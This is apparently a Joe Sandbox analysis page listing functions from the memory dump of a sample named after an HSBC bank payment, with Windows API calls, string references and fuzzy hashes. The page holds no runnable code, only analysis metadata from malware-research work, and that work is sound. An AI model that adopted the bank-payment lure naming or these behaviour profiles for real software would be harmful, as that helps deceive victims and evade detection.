Opcode ID: a021debab228e68a020f7295427b1d8e73fe7c9db1dffae71b4536c3b75acf60
Instruction ID: cf3e435773e66418075bf2b48da38749d599ecb0278fd02f4e33606b4808a369
Opcode Fuzzy Hash: a021debab228e68a020f7295427b1d8e73fe7c9db1dffae71b4536c3b75acf60
Instruction Fuzzy Hash: BA11C1B2900E19EFCB213FB4AC5D79D3B989B053A2B204529FD489A151DFBC88449B95

Function 007244A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007244CF

Part of subcall function 0072407C: _memset.LIBCMT ref: 007240FC
Part of subcall function 0072407C: _wcscpy.LIBCMT ref: 00724150
Part of subcall function 0072407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00724160

KillTimer.USER32(?,00000001,?,?), ref: 00724524
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00724533
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0075D4B9

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 6e0d85b9ab943307591a58570d667e571f8df8e26ada234b2dae80389db3f1a6
Instruction ID: 25c94dad73a26dfeca88ba057cf13b017394d6807bf03627e2b45da7bbab6b1f
Opcode Fuzzy Hash: 6e0d85b9ab943307591a58570d667e571f8df8e26ada234b2dae80389db3f1a6
Instruction Fuzzy Hash: 6E21F5709047D4AFE732CB249845BE6BBECAB05309F04009DEBCA9A141C7B82D88CB45

Function 00796369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00725A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00787896,?,?,00000000), ref: 00725A2C
Part of subcall function 00725A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00787896,?,?,00000000,?,?), ref: 00725A50

gethostbyname.WSOCK32(?,?,?), ref: 00796399
WSAGetLastError.WSOCK32(00000000), ref: 007963A4
_memmove.LIBCMT ref: 007963D1
inet_ntoa.WSOCK32(?), ref: 007963DC

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: a983a9d54f5c7a62849a58f2679c830e9b611c521c0c230a9fc989506bc463a6
Instruction ID: a888b0a04b7a0c0de26c8bc104d52d58edcb083ffc71ef8d920a83c8b3d20dbc
Opcode Fuzzy Hash: a983a9d54f5c7a62849a58f2679c830e9b611c521c0c230a9fc989506bc463a6
Instruction Fuzzy Hash: 1B116072500119EFCF04FBA4ED4ACEEB7B9EF45310B148165F505A7161DB38AE14DB61

Function 00778B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00778B61
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00778B73
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00778B89
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00778BA4

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 46a741c296a5de4e4826ceaac7bef05eabb832665e5e7e1891f312cda248bd3d
Instruction ID: ebb713f5ad28c550eba2e6fb6b2a6b3e73670139ef56296d049ad2e58dc27a24
Opcode Fuzzy Hash: 46a741c296a5de4e4826ceaac7bef05eabb832665e5e7e1891f312cda248bd3d
Instruction Fuzzy Hash: 2D113AB9940218FFDF11DB95C884EADBB74EB48350F204095E904B7250DA716E10DB94

Function 00721290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00722612: GetWindowLongW.USER32(?,000000EB), ref: 00722623

DefDlgProcW.USER32(?,00000020,?), ref: 007212D8
GetClientRect.USER32(?,?), ref: 0075B5FB
GetCursorPos.USER32(?), ref: 0075B605
ScreenToClient.USER32(?,?), ref: 0075B610

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: e7a8e43358dc2310a638dacd3319aa37be094f13544eae2c615955280b83f594
Instruction ID: 8231bf4710c4cd68095b2f45fe71ab86062506a92f8041dab4f5be6366aa576e
Opcode Fuzzy Hash: e7a8e43358dc2310a638dacd3319aa37be094f13544eae2c615955280b83f594
Instruction Fuzzy Hash: BA112B35A00069EFCB10DF94E8899EE77F8FB56301F504455F901E7141D738BA51CBA9

Function 0077D831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0077D84D
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0077D864
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0077D879
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0077D897

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: c49c40bc01684d6d54dfe6bd15214d5f9246e8bdc3f6d5e191233881b1587561
Instruction ID: 27b4e23d7d69c34c0155e08c7a1f982425047be7f9f129c1427ac98a3ff020ce
Opcode Fuzzy Hash: c49c40bc01684d6d54dfe6bd15214d5f9246e8bdc3f6d5e191233881b1587561
Instruction Fuzzy Hash: C411A1B5605304DBEB308F90DC08F93BBBCEF44B50F10C569E51AC6040D7B8E9089BA2

Function 00756FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00756FDB

Part of subcall function 007576C2: __fltout2.LIBCMT ref: 007576EB

__cftog_l.LIBCMT ref: 00757001
__cftoe_l.LIBCMT ref: 00757033

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 4dc8c512a39e9760f9ac9e9f12b33c549085bb7f9e0fa38d3aebce467a09eaf2
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 63014B7244814EBBCF1A5E84EC05CEE3FA6BB18352B588415FE1859071D27AC9B9EB81

Function 007AB2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 007AB2E4
ScreenToClient.USER32(?,?), ref: 007AB2FC
ScreenToClient.USER32(?,?), ref: 007AB320
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 007AB33B

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: ea7305400be4abb7e9ddc8f78c2b543a644bb1aaa83bf33be0091849ea15fd94
Instruction ID: 7e1d865055a4d2833ef428c382ab186c9ccb645dbfbfa3a1ff5fc1c64da4ae81
Opcode Fuzzy Hash: ea7305400be4abb7e9ddc8f78c2b543a644bb1aaa83bf33be0091849ea15fd94
Instruction Fuzzy Hash: 781144B9D00209EFDB41CFA9C8849EEBBF9FF49311F108166E914E3220D735AA559F94

Function 00786BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00786BE6

Part of subcall function 007876C4: _memset.LIBCMT ref: 007876F9

_memmove.LIBCMT ref: 00786C09
_memset.LIBCMT ref: 00786C16
LeaveCriticalSection.KERNEL32(?), ref: 00786C26

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: 786b932ef59e2d4ed366a673bafccdd196135f55814c89e61420cc23bacf03c1
Instruction ID: 5b01cb9efa15269a640cb0d6cc77521a7ed2dec35880c20c771131301de47ba7
Opcode Fuzzy Hash: 786b932ef59e2d4ed366a673bafccdd196135f55814c89e61420cc23bacf03c1
Instruction Fuzzy Hash: E9F0543A200100BBCF456F95DC89A4ABB29EF85320F04C061FE085E267D735E811CBB5

Function 00722218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00722231
SetTextColor.GDI32(?,000000FF), ref: 0072223B
SetBkMode.GDI32(?,00000001), ref: 00722250
GetStockObject.GDI32(00000005), ref: 00722258
GetWindowDC.USER32(?,00000000), ref: 0075BE83
GetPixel.GDI32(00000000,00000000,00000000), ref: 0075BE90
GetPixel.GDI32(00000000,?,00000000), ref: 0075BEA9
GetPixel.GDI32(00000000,00000000,?), ref: 0075BEC2
GetPixel.GDI32(00000000,?,?), ref: 0075BEE2
ReleaseDC.USER32(?,00000000), ref: 0075BEED

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: abe6bdae7b89eb52b6021bceb0f2657bb845f18281f50bf26641c50c7fb630f0
Instruction ID: 01d34c2250fcbec51e53fe221bd4f0dc76095576369e95aa1bb90028595faeab
Opcode Fuzzy Hash: abe6bdae7b89eb52b6021bceb0f2657bb845f18281f50bf26641c50c7fb630f0
Instruction Fuzzy Hash: 48E06D32504248EADF215FA4FC0D7E83F10EB46332F14C376FA69880E187BA4994DB26

Function 00778712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 0077871B
OpenThreadToken.ADVAPI32(00000000,?,?,?,007782E6), ref: 00778722
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,007782E6), ref: 0077872F
OpenProcessToken.ADVAPI32(00000000,?,?,?,007782E6), ref: 00778736

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 2b9291216053feac05d719409a7dcc5dc20c30b182253f614b77ecd2e1207be3
Instruction ID: 85752b35b67b10afb79cd3d844c2714915a7d2b4445b1687cdf9a9e3a6d9c88e
Opcode Fuzzy Hash: 2b9291216053feac05d719409a7dcc5dc20c30b182253f614b77ecd2e1207be3
Instruction Fuzzy Hash: B8E086366512119BDB605FF09D0CB973BACEF927D1F14C828F24AC9080DA3C8441C755

Function 00726240 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON

Download Yara Rule

Strings

%{, xrefs: 0072624E

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID:
String ID: %{
API String ID: 0-3407211727
Opcode ID: 33dbf10cf7f722235058f2eb34ff70b5f0921cc154876f4fdde7d0978606d6ef
Instruction ID: 86edab6cf3415980c3ecb31ab357124d880ce98c0d94075b4a8629e09aff8add
Opcode Fuzzy Hash: 33dbf10cf7f722235058f2eb34ff70b5f0921cc154876f4fdde7d0978606d6ef
Instruction Fuzzy Hash: 4EB19E71900129DBCF24EF94E8859FEB7B5FF48310F104127E956A7292EB389E85CB91

Function 0079AEA2 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON

Download Yara Rule

APIs

__itow_s.LIBCMT ref: 0079AFAE

Strings

xb~, xrefs: 0079B010
xb~, xrefs: 0079AFE4

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: __itow_s
String ID: xb~$xb~
API String ID: 3653519197-3572622674
Opcode ID: 63a495c68458c660a603b477a41ef86780ecd078ff736de10f195fd4e1ab3d7a
Instruction ID: 25b23ce8065c51dc31e09d819f521719ce4633b7f78d6a09e0b08f4739e00020
Opcode Fuzzy Hash: 63a495c68458c660a603b477a41ef86780ecd078ff736de10f195fd4e1ab3d7a
Instruction Fuzzy Hash: 62B1A170A00109EFCF14DF54E995DBABBB9FF58310F148059FA459B291EB38E980CBA0

Function 0078AFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 0073FC86: _wcscpy.LIBCMT ref: 0073FCA9

Part of subcall function 00729837: __itow.LIBCMT ref: 00729862
Part of subcall function 00729837: __swprintf.LIBCMT ref: 007298AC

__wcsnicmp.LIBCMT ref: 0078B02D
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0078B0F6

Strings

LPT, xrefs: 0078B027

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: 314fdf92c4bc089daff2c26ec8c8006518dac629aff995559abf09672f2a8d5b
Instruction ID: 7668334d3e4fc85e9733c317c670743cda6e9d882d3bd059e58ff8e40ebdee79
Opcode Fuzzy Hash: 314fdf92c4bc089daff2c26ec8c8006518dac629aff995559abf09672f2a8d5b
Instruction Fuzzy Hash: 3461C575E40218EFCB14EF94D899EAEB7B5EF09310F144069F916AB391D738AE40CB54

Function 00732957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00732968
GlobalMemoryStatusEx.KERNEL32(?), ref: 00732981

Strings

@, xrefs: 00732975

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 2100af5003261345a812e330f66480f453a04838f925e08a55dd0677ccfbad6b
Instruction ID: 871dfdeed2ddb26fd2fde58cebf8cd3984bacb4f8fca494479be5af6b86f3bd5
Opcode Fuzzy Hash: 2100af5003261345a812e330f66480f453a04838f925e08a55dd0677ccfbad6b
Instruction Fuzzy Hash: 13514572408754DBD320EF10E88ABAFBBE8FB85354F46885DF2D8410A1DB359529CB66

Function 00789734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00724F0B: __fread_nolock.LIBCMT ref: 00724F29

_wcscmp.LIBCMT ref: 00789824
_wcscmp.LIBCMT ref: 00789837

Strings

FILE, xrefs: 00789770

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: b9bf06f25b960786377b0dfa60e5e08de4701f99514a01f49674b87d5683b70d
Instruction ID: 19825d7d347a234a63139a99a0709edd67175a8f549feaba83bb8669bf6dfbd1
Opcode Fuzzy Hash: b9bf06f25b960786377b0dfa60e5e08de4701f99514a01f49674b87d5683b70d
Instruction Fuzzy Hash: EE41C871A4021ABADF20AEA0DC49FEFB7BDDF85710F040469FA04B7181DB79A9048B61

Function 00760574 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0076057F

Strings

Dd~, xrefs: 0072A317
Dd~, xrefs: 0072A151

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: ClearVariant
String ID: Dd~$Dd~
API String ID: 1473721057-373322267
Opcode ID: 61caa01a63a9af09e8da0a815bbd66d0e19d087865a92127a7f0c8b20c9aa51b
Instruction ID: 8618f75da192704c8699a40f713c88b501ef5226960706b37bf30d332a71d6be
Opcode Fuzzy Hash: 61caa01a63a9af09e8da0a815bbd66d0e19d087865a92127a7f0c8b20c9aa51b
Instruction Fuzzy Hash: E9510478605391EFDB54CF19D580A1ABBF1BB99750F54881CE9858B361E339EC81CF82

Function 0079258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0079259E
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 007925D4

Strings

|, xrefs: 007925A5

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 707bcba7ae19f64351ff59a64b17864454f03aa7b9e10312a7d00f229d8022fb
Instruction ID: d61073124fc61d6372ce1eda54915527c53e009e730a6cf289ff01617393da15
Opcode Fuzzy Hash: 707bcba7ae19f64351ff59a64b17864454f03aa7b9e10312a7d00f229d8022fb
Instruction Fuzzy Hash: 24311A71800119EBCF15EFA1DC89EEEBFB8FF08350F104059F915A6262EB395956DB60

Function 007A7A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 007A7B61
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007A7B76

Strings

', xrefs: 007A7ACA

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

